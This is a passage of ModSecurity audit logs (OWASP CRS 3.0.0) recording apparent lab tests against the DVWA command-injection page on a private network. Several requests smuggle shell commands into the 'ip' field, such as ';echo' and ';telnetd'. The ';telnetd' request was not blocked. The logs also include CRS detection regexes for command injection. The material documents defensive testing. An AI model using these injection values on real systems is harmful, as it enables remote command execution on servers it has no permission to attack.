'\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":911,"p2":3883,"p3":0,"p4":0,"p5":186,"sr":40,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:23 --0400","transaction_id":"WRczc38AAQEAAAkW4RoAAAAB","remote_address":"192.168.75.145","remote_port":56764,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"27"},"body":["ip=%3Btelnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczc38AAQEAAAkW4RoAAAAB\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":594,"p2":2361,"p3":153,"p4":1613,"p5":75,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:38 --0400","transaction_id":"WRczgn8AAQEAAAkXs@YAAAAC","remote_address":"192.168.75.145","remote_port":56766,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"56"},"body":["ip=192.168.75.134%3B+echo+%22helo+world%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; echo \\x22helo world found within ARGS:ip: 192.168.75.134; echo \\x22helo world\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ; echo found within ARGS:ip: 192.168.75.134; echo \\x22helo world\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; echo \\\\\\\\x22helo world found within ARGS:ip: 192.168.75.134; echo \\\\\\\\x22helo world\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ; echo found within ARGS:ip: 192.168.75.134; echo \\\\\\\\x22helo world\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":488,"p2":15193,"p3":0,"p4":0,"p5":192,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:03 --0400","transaction_id":"WRczm38AAQEAAAkYuEsAAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 14:34:24 GMT","If-None-Match":"\"15a-54f68b7e775af\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:26:00 GMT","ETag":"\"1a8-54f6a470f3057\"","Accept-Ranges":"bytes","Content-Length":"424","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRczm38AAQEAAAkYuEsAAAAD\"]"],"stopwatch":{"p1":667,"p2":1658,"p3":113,"p4":393,"p5":94,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:04 --0400","transaction_id":"WRcznH8AAQEAAAkYuEwAAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcznH8AAQEAAAkYuEwAAAAD\"]"],"stopwatch":{"p1":805,"p2":1564,"p3":87,"p4":464,"p5":65,"sr":48,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:04 --0400","transaction_id":"WRcznH8AAQEAAAkYuE0AAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at 